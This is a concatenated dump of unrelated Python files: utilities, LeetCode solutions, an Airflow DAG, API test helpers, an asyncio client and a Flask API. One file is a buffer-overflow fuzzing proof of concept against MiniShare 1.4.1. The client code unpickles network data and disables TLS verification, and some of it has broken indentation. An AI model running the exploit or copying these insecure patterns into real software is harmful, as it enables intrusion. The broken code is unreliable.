    Returns the module-level ipAddressDict mapping ip -> 'YES'/'NO';
    results from earlier calls remain in the dict.
    """
    global ipAddressDict
    workers = [threading.Thread(target=scan, args=(ip,)) for ip in ipAddressList]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    return ipAddressDict
|
# Year 2018
# Exercise completed during the course
# @jadilson12
# Program that approves or rejects a bank loan for buying a house.
casa = float(input("Valor da casa: R$"))
salario = float(input("Salário do comprador : R$"))
anos = int(input("Quantos anos de finaciamento: "))
# Fixed monthly installment spread over the whole financing term.
pestacao = casa / (anos * 12)
# Lending rule: the installment may not exceed 30% of the buyer's salary.
minimo = (salario*30) /100
print('Para pagar a casa de {:.2f} em {} anos'.format(casa,anos), end='')
print(' o valor da pestação é R${:.2f}'.format(pestacao))
if minimo >= pestacao:
    print("\n{}\n".format('Parabéns! Seu empréstimo foi Aprovado'))
else:
    print("\n{}\n ".format('Desculpe seu cretido não foi aprovado'))
|
import cv2
import mss
import imutils
import os
import sys
import time
import datetime
from imutils import contours
import numpy as np
def referenceGrabber(n=0):
    # Placeholder -- reference-image capture is not implemented yet.
    return
def _write_value(fullpath, text):
    # Best-effort write: another process may hold the file open (Windows), so
    # a PermissionError is reported but not fatal.
    try:
        with open(fullpath, 'w') as f:
            f.write(text)
    except PermissionError as err:
        print("OS error: {0}".format(err))


def grabber(pair_title, n, sct):
    """Grab the n-th TS column on monitor 2 and persist its green/red state.

    Writes '<pair_title> old.txt' (signed bar count) and '<pair_title> new.txt'
    (signed contour area, or '0') into the 'files' directory next to this script.
    """
    # Geometry of one TS column on the second monitor; 'new' sits above 'old'.
    top, left = 20, 4
    width, height = 72, 119
    monitor_number = 2
    mon = sct.monitors[monitor_number]
    monitor_TS_new = {'top': mon['top'] + top, 'left': mon['left'] + left + width * n, 'width': width, 'height': height, 'mon': monitor_number,}
    monitor_TS_old = {'top': mon['top'] + top + height, 'left': mon['left'] + left + width * n, 'width': width, 'height': height, 'mon': monitor_number,}
    frame_TS_new = cv2.cvtColor(np.array(sct.grab(monitor_TS_new)), cv2.COLOR_RGBA2RGB)
    frame_TS_old = cv2.cvtColor(np.array(sct.grab(monitor_TS_old)), cv2.COLOR_RGBA2RGB)
    # Colour-detection bounds (threshold values kept verbatim from the original).
    green_lower_range, green_upper_range = np.array([0, 15, 0]), np.array([10, 255, 10])
    red_lower_range, red_upper_range = np.array([0, 0, 30]), np.array([85, 100, 255])
    red_lower_range_old, red_upper_range_old = np.array([0, 0, 120]), np.array([10, 10, 255])
    # Colour-mask each TS region.
    green_mask_TS_new = cv2.inRange(frame_TS_new, green_lower_range, green_upper_range)
    red_mask_TS_new = cv2.inRange(frame_TS_new, red_lower_range, red_upper_range)
    green_mask_TS_old = cv2.inRange(frame_TS_old, green_lower_range, green_upper_range)
    red_mask_TS_old = cv2.inRange(frame_TS_old, red_lower_range_old, red_upper_range_old)
    # Contours for the Old TS (OpenCV 2 vs 3 return tuples of different shape).
    cnts_green_old = cv2.findContours(green_mask_TS_old.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    cnts_green_old = cnts_green_old[0] if imutils.is_cv2() else cnts_green_old[1]
    cnts_red_old = cv2.findContours(red_mask_TS_old.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    cnts_red_old = cnts_red_old[0] if imutils.is_cv2() else cnts_red_old[1]
    # Count the green (positive) or red (negative) boxes for the Old TS.
    here = os.path.dirname(os.path.realpath(__file__))
    subdir = 'files'
    fullpath = os.path.join(here, subdir, pair_title + ' old.txt')
    green_bars = 0
    red_bars = 0
    if len(cnts_green_old) > 0:
        for c in cnts_green_old:
            if cv2.contourArea(c) > 100:
                green_bars += 1
        if green_bars > 0:
            _write_value(fullpath, str(green_bars))
    elif len(cnts_red_old) > 0:
        for c in cnts_red_old:
            if cv2.contourArea(c) > 100:
                red_bars -= 1
        if red_bars < 0:
            _write_value(fullpath, str(red_bars))
    # BUGFIX: the original `green_bars == 0 & red_bars == 0` parses as
    # `green_bars == (0 & red_bars) == 0` (i.e. only green_bars is checked),
    # so a fresh red reading could be zeroed out. Use a logical `and`.
    if green_bars == 0 and red_bars == 0:
        if time.time() > os.path.getmtime(fullpath) + 300:  # 5 min persist
            _write_value(fullpath, '0')
    # Contours for the New TS.
    cnts_green_new = cv2.findContours(green_mask_TS_new.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    cnts_green_new = cnts_green_new[0] if imutils.is_cv2() else cnts_green_new[1]
    cnts_red_new = cv2.findContours(red_mask_TS_new.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    cnts_red_new = cnts_red_new[0] if imutils.is_cv2() else cnts_red_new[1]
    # Save the New TS value: positive green area, negative red area, or '0'.
    fullpath = os.path.join(here, subdir, pair_title + ' new.txt')
    zero_green, zero_red = True, True
    if len(cnts_green_new) > 0:
        for c in cnts_green_new:
            # Ignore contours that are not sufficiently large.
            if cv2.contourArea(c) > 175:
                zero_green = False
                area = cv2.contourArea(c)
                _write_value(fullpath, str(area))
    elif len(cnts_red_new) > 0:
        for c in cnts_red_new:
            # Ignore contours that are not sufficiently large.
            if cv2.contourArea(c) > 175:
                zero_red = False
                area = cv2.contourArea(c)
                _write_value(fullpath, '-' + str(area))
    if zero_green and zero_red:
        _write_value(fullpath, '0')
    #cv2.imshow("Green TS New Raw", green_mask_TS_new)
    #cv2.imshow("Green TS Old Raw", green_mask_TS_old)
    #cv2.imshow("Red TS New Raw", red_mask_TS_new)
    #cv2.imshow("Red TS Old Raw", red_mask_TS_old)
#FX_pairs_list = ['REF':0,'GU':1, 'EU':2,'UJ':3,'UC':4,'CL':5,'DX':6]
def main():
    """Continuously capture all tracked pairs, logging a heartbeat every ~10s."""
    last_report = 0
    while True:
        with mss.mss() as sct:
            for pair, slot in (('GU', 1), ('EU', 2), ('UJ', 3),
                               ('UC', 4), ('CL', 5), ('DX', 6)):
                grabber(pair, slot, sct)
        #time.sleep(1)
        if time.time() > last_report + 10:
            stamp = datetime.datetime.now().strftime('%Y.%m.%d %H:%M:%S.%f')[:-4]
            print('TS Detect running at ' + stamp + '...')
            last_report = time.time()


if __name__ == '__main__':
    main()
|
from airflow import models
from airflow.contrib.operators.dataproc_operator import DataprocClusterCreateOperator, DataprocClusterDeleteOperator, DataProcPySparkOperator
from datetime import datetime, timedelta
from operators.http_to_gcs import HttpToGcsOperator
# Default arguments applied to every task in the DAG.
default_args = {
    'owner': 'AirFlow',
    'start_date': datetime(2020, 2, 14),
    'retry_delay': timedelta(minutes=5)
}
# Bucket holding the PySpark job script.
GCS_BUCKET = 'seth_sucks'
PYSPARK_JOB = 'gs://' + GCS_BUCKET + '/spark-jobs/compute_aggregates.py'
# Daily pipeline: create an ephemeral Dataproc cluster, run the aggregation
# job on it, then tear the cluster down again.
with models.DAG('ComputeStats', default_args=default_args, schedule_interval="0 0 * * *") as dag:
    create_cluster = DataprocClusterCreateOperator(
        task_id='CreateCluster',
        # Cluster name is templated with the run date so concurrent runs don't collide.
        cluster_name="analyse-pricing-{{ ds }}",
        project_id="afspfeb3-9d4bdb09f618016d0bc39",
        num_workers=2,
        zone="europe-west4-a",
        dag=dag,
    )
    compute_aggregates = DataProcPySparkOperator(
        task_id="compute_aggregates",
        main=PYSPARK_JOB,
        cluster_name="analyse-pricing-{{ ds }}",
        dag=dag,
    )
    delete_cluster = DataprocClusterDeleteOperator(
        task_id='DeleteCluster',
        cluster_name="analyse-pricing-{{ ds }}",
        project_id="afspfeb3-9d4bdb09f618016d0bc39",
        dag=dag,
    )
    # Linear ordering: create -> compute -> delete.
    create_cluster >> compute_aggregates >> delete_cluster
|
#coding=utf-8
import time,json,hashlib,os,rsa
import sys,re,base64,requests
from config import config
class rsaEncryption:
    """RSA public-key encryption helpers used to protect request parameters."""

    def __init__(self):
        pass

    # RSA public-key encryption of one chunk (<=117 bytes for RSA-1024 PKCS#1).
    def PublicRSA(self, PartJsonParameter):
        """Encrypt one parameter chunk and return its base64-encoded ciphertext (bytes)."""
        publicKey =b"""-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCiwJbb2EeK9ZB4Chyj5/mIVPRE
od0pJrv3LM2UVtkod+2mPVjV9Xi1E06gUaoexX/ebfRXm1eBwu3LtYbklh5Ji5oF
ycoUCFhwzhmm8ZtjdkCIicFfxUU4I5NunL6+37+hy43EgCrao5tFgHtnkeR/vNyG
faxdxevPbVEtWlJz6wIDAQAB
-----END PUBLIC KEY-----"""
        key = rsa.PublicKey.load_pkcs1_openssl_pem(publicKey)
        MiddleCipher = rsa.encrypt(str.encode(PartJsonParameter), key)
        # base64.encodestring() was removed in Python 3.9;
        # base64.encodebytes() is the drop-in replacement.
        SecretText = base64.encodebytes(MiddleCipher)
        #return (bytes.decode(SecretText)).replace("\n","")
        return SecretText

    # Segmented encryption: encrypt the parameter string slice by slice.
    def SliceEncryption(self, JsonPara):
        """RSA-encrypt *JsonPara* in 117-char slices and concatenate the ciphertexts."""
        # Split the input into <=117-char chunks.
        PartSecretTextList = re.split(r'(.{117})', JsonPara)
        SecretParameter = ''
        for PartSecretText in PartSecretTextList:
            # re.split() with a capturing group yields empty strings between
            # captures. Skip them with `continue` -- the original called
            # list.remove() while iterating, which shifts the iteration index
            # and silently skips real chunks on multi-chunk input.
            if PartSecretText == '':
                continue
            key = bytes.decode(self.PublicRSA(PartSecretText))
            #SecretParameter=(SecretParameter+key)[:-1]
            SecretParameter = SecretParameter + key
        # Return the concatenated ciphertext.
        return SecretParameter
class authentication:
    """Builds signed request dictionaries and manages the cached auth_session."""

    def __init__(self):
        # File where the current auth_session token is cached between runs.
        self.authsessionParaPath = config.autoFrameworkPathSetDic["authsessionParaPath"]

    def md5(self, SignStr):
        """Return the hex MD5 digest of *SignStr*, or False if it is not a str."""
        if isinstance(SignStr, str):
            m = hashlib.md5()
            m.update(SignStr.encode('utf-8'))
            return m.hexdigest()
        else:
            return False

    def SortDicAndTurnToStr(self, DicSignPara):
        """Sort the dict by key and concatenate every key and value into one string."""
        ListBeforeMD5 = sorted(DicSignPara.items(), key=lambda asd: asd[0], reverse=False)
        StrSignPara = ''
        for dictKey, dictValue in ListBeforeMD5:
            StrSignPara = StrSignPara + str(dictKey) + str(dictValue)
        return StrSignPara

    def ParamsJsonCreate(self, Parameter, ParaType):
        """Serialize business params to JSON; ParaType 'Y' additionally strips spaces."""
        if ParaType == 'Y':
            JsonParameter = json.dumps(Parameter).replace(' ', '')
        else:
            JsonParameter = json.dumps(Parameter)
        return JsonParameter

    def CreateEntryDic(self, BusinessParameters, AuthSession, result=0):
        """Build the full POST parameter dict (public params + MD5 sign).

        :param BusinessParameters: dict of business parameters
        :param AuthSession: current auth_session token
        :param result: 0 -> RSA-encrypt the params and use the plain sign;
                       otherwise send params in clear with the salted sign
        """
        # Business-parameter handling.
        if len(BusinessParameters) > 0:
            # Serialize the raw business parameters to a JSON string.
            ParaType = 'Y'
            JsonBusinessParameter = self.ParamsJsonCreate(BusinessParameters, ParaType)
            # RSA-encrypt and pass as `para`.
            if result == 0:
                rsaPara = rsaEncryption()
                para = rsaPara.SliceEncryption(JsonBusinessParameter).replace('\n', '')
            else:
                para = JsonBusinessParameter
        else:
            ParaType = 'N'
            para = self.ParamsJsonCreate(BusinessParameters, ParaType)
        # Input dict used to derive the sign parameter.
        CreateSignPara = {
            "timestamp": int(time.time()),
            "app_id": config.InterfacePubPara['app_id'],
            "version": config.InterfacePubPara['version'],
            "session": config.InterfacePubPara['session'],
            "auth_session": AuthSession,
            "params": para
        }
        # Flatten to the canonical key/value string.
        JsonSignPara = self.SortDicAndTurnToStr(CreateSignPara)
        secret = config.InterfacePubPara['secret']
        # MD5 of the flattened params plus the secret yields the sign.
        if result == 0:
            sign = self.md5(JsonSignPara + secret)
        else:
            sign = self.md5("2ea342511cb908728db3998d71f4161f" + JsonSignPara + secret)
        DicInterfaceTestPara = CreateSignPara
        DicInterfaceTestPara['sign'] = sign
        return DicInterfaceTestPara

    def authSessionCreate(self):
        """Log the configured user in and cache the returned auth_session to disk."""
        loginApiPara = {}
        # base64.encodestring() was removed in Python 3.9; encodebytes() is equivalent.
        loginApiPara['name'] = base64.encodebytes(('miababy' + config.LoginUsername).encode()).decode()[:-1]
        loginApiPara['password'] = base64.encodebytes(('miababy' + config.LoginPassword).encode()).decode()[:-1]
        AuthSession = "5ca6242f7db1b275783d95a4892727e8"
        interfacePara = self.CreateEntryDic(loginApiPara, AuthSession)
        url = config.BaseURL[0] + '/account/Login/'
        result = (requests.post(url, interfacePara)).text
        # json.loads() lost its 'encoding' kwarg in Python 3.9; the text is
        # already a decoded str here.
        result = json.loads(result)
        AuthSession = result['content']['auth_session']
        # `with` guarantees the cache file is closed even on write failure.
        with open(self.authsessionParaPath, 'w') as AuthSessionPara:
            AuthSessionPara.write(AuthSession)

    def cycleRequest(self, requestMethod, requestURL, requestParas, paraWant, judgeValue, stopNum):
        """Poll an endpoint up to *stopNum* times until content[paraWant] == judgeValue.

        Returns the string "True" on match, "False" after exhausting retries.
        """
        for i in range(int(stopNum)):
            # Dispatch via getattr instead of eval() -- identical behaviour
            # without building and evaluating a code string.
            requestResult = getattr(requests, requestMethod)(requestURL, requestParas)
            requestResult = json.loads(requestResult.text)
            catch = requestResult['content'][paraWant]
            time.sleep(1)
            print(catch)
            if catch == judgeValue or catch == int(judgeValue):
                return "True"
            elif i == int(stopNum) - 1:
                return "False"

    def cleanCart(self):
        """Delete every row currently in the shopping cart."""
        url = config.BaseURL[0] + '/cart/info/'
        with open(self.authsessionParaPath) as sessionFile:
            AuthSession = sessionFile.read()
        interfacePara = self.CreateEntryDic({}, AuthSession)
        result = requests.post(url, interfacePara)
        result = json.loads(result.text)
        catch = result["content"]["row_infos"]
        # Collect every row id across all item groups.
        rowidList = []
        for itemGroup in catch:
            for items in (itemGroup["item_group"]):
                for item in items["items"]:
                    rowidList.append(item["id"])
        # Delete the rows one by one.
        for rowid in rowidList:
            para = {"row_id": rowid}
            interfacePara2 = self.CreateEntryDic(para, AuthSession)
            url2 = config.BaseURL[0] + '/cart/delete/'
            result = requests.post(url2, interfacePara2)
            result = json.loads(result.text)
if __name__=="__main__":
aa=authentication()
paras=aa.authSessionCreate()
print(paras)
|
##########
#Question#
##########
'''
URL: https://leetcode.com/problems/search-insert-position/
Given a sorted array of distinct integers and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.
Example 1:
Input: nums = [1,3,5,6], target = 5
Output: 2
Example 2:
Input: nums = [1,3,5,6], target = 2
Output: 1
Example 3:
Input: nums = [1,3,5,6], target = 7
Output: 4
Example 4:
Input: nums = [1,3,5,6], target = 0
Output: 0
Example 5:
Input: nums = [1], target = 0
Output: 0
Constraints:
1 <= nums.length <= 10^4
-10^4 <= nums[i] <= 10^4
nums contains distinct values sorted in ascending order.
-10^4 <= target <= 10^4
'''
##########
#Solution#
##########
class Solution:
    def searchInsert(self, nums: List[int], target: int) -> int:
        """Return the index of target in sorted nums, or its insertion point.

        Uses binary search (O(log n)) and, unlike the original
        append-and-sort approach, does not mutate the caller's list.
        """
        from bisect import bisect_left  # local import keeps the snippet self-contained
        # nums is sorted and distinct, so bisect_left returns the index of
        # target when present, otherwise the in-order insertion point.
        return bisect_left(nums, target)
|
#!/usr/bin/python3.8
# This is a Proof of concept about BufferOverflow vulnerability in MiniShare 1.4.1
# Part 2 of proof of concept by Vry4n
# This script is intended send all the buffer size in one packet, we need to see if EIP value gets overwritten 41414141 (AAAA)
import socket
FUZZ = "A" * 1800
print("Fuzzing with {} bytes".format(len(FUZZ)))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(("192.168.0.5", 80))
# from a web proxy capturing the HTTP GET Request, we got this line "GET / HTTP/1.1" This is the vulnerable section
s.send(b"GET " + FUZZ.encode() + b"HTTP/1.1\r\n\r\n")
s.recv(1024)
s.close()
|
import logging
import asyncio
import pickle
import ssl
from message_types import measurement_msg
# Module-level logger, named after this module.
_logger = logging.getLogger(__name__)
def create_ssl_context(ssl_dict):
    """
    loads the ssl certificate for secure communication
    :param ssl_dict: dictionary consisting of certification file, key
                     keys: certFile, keyFile
    :returns ssl.SSLContext
    :raises ssl.SSLError: if the certificate chain cannot be loaded
    """
    _logger.debug("#debug:loading-ssl-certificates")
    try:
        # choosing the version of the SSL Protocol: PROTOCOL_SSLv23 negotiates
        # the highest mutually supported version; legacy SSLv2/SSLv3 are then
        # explicitly disabled via the option flags below
        ssl_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        ssl_context.options |= ssl.OP_NO_SSLv2
        ssl_context.options |= ssl.OP_NO_SSLv3
        ssl_context.load_cert_chain(certfile=ssl_dict["certFile"], keyfile=ssl_dict["keyFile"])
        # NOTE(review): peer certificates are NOT verified (CERT_NONE, no
        # hostname check) -- confirm this is acceptable for the deployment.
        ssl_context.verify_mode = ssl.CERT_NONE
        ssl_context.check_hostname = False
        _logger.info("#info:ssl-certificates-loaded!")
        return ssl_context
    except ssl.SSLError as e:
        _logger.exception(e)
        _logger.error("#error:could-not-load-the-ssl-certificates")
        raise e
class CommunicationModule():
"""
This class is responsible for handling communications with Server
_to_be_acknowledged: is a dictionary, where keys are message_id and values
are the message itself, which is a list of dictionaries, each dictionary represents
a measurement
_to_be_sent: which is a list of dictionaries, each dictionary represents
a measurement
"""
    def __init__(self, server_host, server_port, ssl_context):
        """Store connection parameters; the socket itself is opened by connect()."""
        self._server_host = server_host
        self._server_port = server_port
        self._ssl_context = ssl_context
        # reader/writer are populated by connect()
        self._reader = None
        self._writer = None
        # dictionary of Messages which
        # have not been acknowledged
        self._to_be_acknowledged = {}
        # the length of each message, number of
        # measurements to be send together
        self._WINDOW_SIZE = 3
        # the message that will be sent to the server
        # a list of measurements, size : _WINDOW_SIZE
        # each time this list is reach to its limit, a
        # message will be sent and list will be emptied
        self._to_be_sent = []
        # giving ids to the messages
        self._MSG_COUNTER = 0
    @asyncio.coroutine
    def connect(self):
        """Open a connection to the server, populating self._reader/_writer.

        Uses the SSL context given at construction time (may be None for plain TCP).
        """
        # get a connection
        try:
            self._reader, self._writer = yield from \
                asyncio.open_connection(
                    self._server_host, self._server_port,
                    ssl=self._ssl_context)
        except Exception as e:
            _logger.exception(e)
            # the exception will be handled on
            # the next level (report method of
            # the reporter class)
            raise e
@asyncio.coroutine
def send(self, msg):
"""
called by Reporter
sends the measurement alongside the previously buffered messages if the limit (_WINDOW_SIZE)
has been reached(by calling send_message), otherwise appends it to the buffered list (to_be_sent)
:param msg: an instance of an object representing a measurement
"""
try:
msg = msg.__dict__
self._to_be_sent.append(msg)
# check if the _message can be send
if len(self._to_be_sent) >= self._WINDOW_SIZE:
# getting the first _WinDOW_SIZE items
message = self._to_be_sent[0:self._WINDOW_SIZE]
# creating the message, giving a new id
# to the message, and send it to the server
self._MSG_COUNTER += 1
yield from self.send_measurement(self._MSG_COUNTER, message)
response = yield from self.receive_message(self._MSG_COUNTER)
# adding the message to the to_be_acknowledged dictionary
self._to_be_acknowledged[self._MSG_COUNTER] = message
# removing message from _to_be_sent list
self._to_be_sent = self._to_be_sent[self._WINDOW_SIZE:]
if response:
yield from self.handle_response(response)
else:
_logger.warn("#warn:no-ack-received-from-server-for-msg-%s" % self._MSG_COUNTER)
else:
_logger.debug("#debug:msg-will-be-send-later-len(to_be_sent):%s" % len(self._to_be_sent))
except Exception as e:
_logger.error("#error:error-occurred-while-sending-the-message:%s" % msg)
_logger.exception(e)
# to be handled by the upper class Reporter
raise e
@asyncio.coroutine
def send_measurement(self, msg_id, msg):
"""
sends a list of measurements
:param msg_id: int
:param msg: list of dictionaries
:return:
"""
message = measurement_msg.MeasurementMessage(id=msg_id, data=msg)
if msg:
# when we are sending a measurement and msg is not None
_logger.debug('#debug:sending-message-with-id-:%s-and-size:%s' % (msg_id, len(msg)))
yield from self.send_message(message)
@asyncio.coroutine
def receive_message(self, msg_id):
"""
waits to receive response by the other side
:param msg_id: int , the msg we are waiting for its response
:return: (bytes) response sent by server
"""
try:
data = yield from asyncio.wait_for(self._reader.read(1000), timeout=3)
return data
except asyncio.TimeoutError:
_logger.warn("#warn:timeout-reached-while-waiting-for-ack-msg:%s" % msg_id)
@asyncio.coroutine
def send_message(self, message):
"""
Sends a message to the server
:param msg_id: (int) id of the message
:param message: an inherited instance of GeneralMessage
(@see general_message.GeneralMessage)
"""
# packing the message into bytes
byte_message = pickle.dumps(message)
# sending the message to the server
self._writer.write(byte_message)
yield from self._writer.drain()
@asyncio.coroutine
def handle_response(self, message):
"""
handles a message sent by the server
:param message: (bytes)
:return:
"""
try:
message = pickle.loads(message)
# message must be a subclass of GeneralMessage
_logger.debug("received-msg-of-type-%s: " % message.get_type())
if message.get_type() == 'ack':
yield from self.handle_ack(message)
elif message.get_type() == 'request':
yield from self.handle_request(message)
else:
_logger.warn("#warn:unknown-message-type-received:%s" % message.get_type())
except pickle.PickleError:
_logger.error("#error:Pickling-error-while-analyzing-message:%s" % message)
except KeyError:
_logger.warn("#debug:-corrupted-message-received-%s" % message)
except AttributeError:
_logger.error("#error:message-is-corrupted-%s" % message)
@asyncio.coroutine
def handle_ack(self, ack):
"""
analyzes the acknowledgment sent by the server
:param ack: an instance of type AckknowledgmentMessage
:return:
"""
try:
_logger.debug("#debug:ack:%s" % ack)
# checking and removing the delivered message from
# our waiting list
if ack.get_success() in self._to_be_acknowledged:
self._to_be_acknowledged.pop(ack.get_success())
else:
_logger.warn("#debug:acknowledgment-received-for-non-existing-message-id:%s" % ack.get_success())
_logger.debug("#debug:to_be_acknowledged-list:%s" % self._to_be_acknowledged)
# if the server asked for a specific
# msg id send the wanted message
if ack.get_wanted():
# send the msg if we have it in buffer
if ack.get_wanted() in self._to_be_acknowledged:
# sending the message to the server
_logger.debug("#debug:sending-wanted-message-id: %s" % ack.get_wanted())
yield from self.send_measurement(ack.get_wanted(), self._to_be_acknowledged[ack.get_wanted()])
response = yield from self.receive_message(ack.get_wanted)
yield from self.handle_response(response)
# the msg asked by server does not exists
# in buffer
else:
_logger.warn("#debug:acknowledgment-received-for-non-existing-message-id:%s" % ack.get_wanted())
_logger.debug("#debug:to_be_acknowledged-list:%s" % self._to_be_acknowledged)
# sending None for this message_id
# server will stop requesting for this id
yield from self.send_measurement(ack.get_wanted(), None)
except pickle.PickleError:
_logger.error("#error:Pickleing-error-while-analyzing-ack:%s" % ack)
except KeyError:
_logger.warn("#debug:-corrupted-ack-received-%s" % ack)
@asyncio.coroutine
def handle_request(self, msg):
"""
handles a request for getting message counter of the client by
the server, sends the server the news value for the _MSG_COUNTER
:param msg: an instance of type requests.Request message type
:return:
"""
if msg.get_request() == 'GET_MSG_COUNTER':
msg.set_response(self._MSG_COUNTER)
yield from self.send_message(msg)
def disconnect(self):
_logger.info("#info:disconnecting-the-communication-module...")
self._writer.close()
|
from pythonforandroid.recipes.setuptools import SetuptoolsRecipe
# Guard against silent upstream changes: if the base recipe's version or
# dependency lists move, the pinned hash below must be re-verified
# against the new source archive before these asserts are updated.
assert SetuptoolsRecipe._version == "51.3.3"
assert SetuptoolsRecipe.depends == ['python3']
assert SetuptoolsRecipe.python_depends == []
class SetuptoolsRecipePinned(SetuptoolsRecipe):
    # SHA-512 of the setuptools 51.3.3 source archive, so the download
    # is integrity-checked rather than trusted blindly.
    sha512sum = "5a3572466a68c6f650111448ce3343f64c62044650bb8635edbff97e2bc7b216b8bbe3b4e3bccf34e6887f3bedc911b27ca5f9a515201cae49cf44fbacf03345"
recipe = SetuptoolsRecipePinned()
|
# Generated by Django 3.1.5 on 2021-02-03 11:10
from django.db import migrations, models
import django.db.models.expressions
class Migration(migrations.Migration):
    """Auto-generated: rebuild the `no_follow_yourself` check constraint.

    The constraint is dropped and re-added so that it enforces
    NOT (user == following), i.e. a user cannot follow themselves.
    """
    dependencies = [
        ('api', '0003_auto_20210203_1106'),
    ]
    operations = [
        migrations.RemoveConstraint(
            model_name='follow',
            name='no_follow_yourself',
        ),
        migrations.AddConstraint(
            model_name='follow',
            constraint=models.CheckConstraint(check=models.Q(_negated=True, user=django.db.models.expressions.F('following')), name='no_follow_yourself'),
        ),
    ]
|
# Definition for singly-linked list.
class ListNode(object):
    # A node of a singly-linked list: `val` is the payload, `next` is
    # wired up by the caller after construction.
    def __init__(self, x):
        self.val = x
        self.next = None
def printL(head):
    # Print the list's values on one line (the Python 2 trailing-comma
    # print keeps them space-separated), then terminate the line.
    while(head!=None):
        print head.val,
        head = head.next
    print ''
class Solution(object):
    def confire(self, head, k):
        # Return True iff at least k nodes remain starting at `head`,
        # i.e. one more full group of k can still be reversed.
        if (head == None):
            return False
        while (k > 0):
            if (head== None):
                return False
            head = head.next
            k = k - 1
        return True
    def reverseKGroup(self, head, k):
        """
        Reverse the list in consecutive groups of k nodes; a final
        group shorter than k is left in its original order.
        :type head: ListNode
        :type k: int
        :rtype: ListNode
        """
        # Dummy node so the head of the result can be re-linked
        # uniformly with every later group.
        start = ListNode(0)
        start.next = head
        node = head
        # `em` tracks the tail of the most recently reversed group.
        em = None
        if (head == None):
            return None
        elif (head.next == None):
            return head
        else:
            # reverse the first full group and hook it to the dummy
            if(self.confire(node,k)):
                st, em, node = self.reverse(node, k)
                start.next = st
            # reverse each remaining full group, splicing it after
            # the previous group's tail
            while(self.confire(node,k)):
                s,e,node = self.reverse(node,k)
                em.next = s
                em = e
            # attach the short (unreversed) remainder, if any
            if(em!=None):
                em.next = node
        return start.next
    def reverse(self,head,k):
        # Reverse the first k nodes via head-insertion behind a dummy.
        # Returns (new_head, new_tail, first_unprocessed_node).
        start = ListNode(0)
        start.next = head
        while(head.next!=None and k-1>0 ):
            temp = head.next
            head.next = temp.next
            temp.next = start.next
            start.next = temp
            k-=1
        l = head.next
        return start.next,head,l
if __name__ == '__main__':
    # Smoke test: build 1->2->...->7 and reverse it as one group of 7.
    head = ListNode(1)
    head.next = ListNode(2)
    head.next.next = ListNode(3)
    head.next.next.next = ListNode(4)
    head.next.next.next.next = ListNode(5)
    head.next.next.next.next.next = ListNode(6)
    head.next.next.next.next.next.next = ListNode(7)
    s = Solution()
    printL(s.reverseKGroup(head,7))
    # printL(s.reverse(head,2))
|
import datetime as dt
import numpy as np
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
#################################################
# Database Setup
#################################################
# SQLite file holding the Hawaii climate data.  check_same_thread=False
# allows the single connection to be used from Flask's worker threads.
# NOTE(review): the one module-level `session` below is shared by all
# requests -- confirm this is acceptable for this demo app.
engine = create_engine("sqlite:///hawaii.sqlite", connect_args={'check_same_thread': False}, echo=True)
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# Save reference to each table
Station = Base.classes.station
Measurement = Base.classes.measurement
# Create our session (link) from Python to the DB
session = Session(engine)
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
#################################################
# Flask Routes
#################################################
@app.route("/")
def welcome():
return (
f"Welcome to My Surfs Up! API! It is totally tubular!<br/>"
f"Available Routes:<br/>"
f"/api/v1.0/precipitation:<br/>"
f"/api/v1.0/stations<br/>"
f'/api/v1.0/tobs<br/>'
f'/api/v1.0/<start><br/>'
f'(enter start date in YYYY-MM-DD format to view temperatures after that date)<br/>'
f'EX: /api/v1.0/2015-08-16<br/>'
f'/api/v1.0/<start>/<end><br/>'
f"(enter start date then end date second in 'YYYY-MM-DD' format to view temperatures between those dates)<br/>"
f"EX: /api/v1.0/2015-08-16/2016-02-15"
)
@app.route("/api/v1.0/precipitation")
def precipitation():
results = session.query(Measurement.date, Measurement.prcp).all()
date_temp_info = []
for measurement in results:
date_temp_dict = {
'date' : measurement.date,
'prcp' : measurement.prcp
}
date_temp_dict["date"] = measurement.date
date_temp_dict["prcp"] = measurement.prcp
date_temp_info.append(date_temp_dict)
return jsonify(date_temp_info)
@app.route("/api/v1.0/stations")
def stations():
results = session.query(Station.station,Station.name).all()
station_info = []
for station in results:
station_name = {
'station' : station.station,
'name' : station.name
}
station_name["station"] = station.station
station_name["name"] = station.name
station_info.append(station_name)
return jsonify(station_info)
@app.route("/api/v1.0/tobs")
def tobs():
results = session.query(Measurement.date, Measurement.tobs).\
filter(Measurement.date>= '2016-08-23').\
order_by(Measurement.date).all()
tobs_data = []
for observations in results:
tobs_dict = {
'date' : observations.date,
'tobs' : observations.tobs
}
tobs_dict["date"] = observations.date
tobs_dict["tobs"] = observations.tobs
tobs_data.append(tobs_dict)
return jsonify(tobs_data)
@app.route("/api/v1.0/<start_date>")
def temp_start(start_date):
results = session.query(Measurement.date, func.min(Measurement.tobs).label('min_temp'),
func.avg(Measurement.tobs).label('avg_temp'),
func.max(Measurement.tobs).label('max_temp')).\
filter(Measurement.date >= start_date).all()
start_stats = []
for stats in results:
start_dict = {
'min_temp' : stats.min_temp,
'avg_temp' : stats.avg_temp,
'max_temp' : stats.max_temp
}
start_dict["min_temp"] = stats.min_temp
start_dict["avg_temp"] = stats.avg_temp
start_dict["max_temp"] = stats.max_temp
start_stats.append(start_dict)
return jsonify(start_stats)
@app.route("/api/v1.0/<start_date>/<end_date>")
def temp_range(start_date, end_date):
results = session.query(Measurement.date, func.min(Measurement.tobs).label('min_temp'),
func.avg(Measurement.tobs).label('avg_temp'),
func.max(Measurement.tobs).label('max_temp')).\
filter((Measurement.date >= start_date) & (Measurement.date <= end_date)).all()
range_stats = []
for stats in results:
range_dict = {
'min_temp' : stats.min_temp,
'avg_temp' : stats.avg_temp,
'max_temp' : stats.max_temp
}
